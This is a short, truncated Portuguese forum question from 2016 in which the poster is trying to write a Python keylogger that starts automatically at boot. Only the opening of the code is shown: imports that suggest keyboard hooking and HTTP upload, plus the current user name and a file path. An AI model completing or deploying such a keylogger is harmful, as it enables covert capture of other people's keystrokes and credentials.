Eu estou tentando fazer um keylogger python que é executado automaticamente na inicialização.
Aqui está o código python
import pyHook, pythoncom, os, httplib, urllib, getpass, shutil, sys
userName = getpass.getuser()
filePath = "C:\users\%s\...
17.06.2016 / 08:02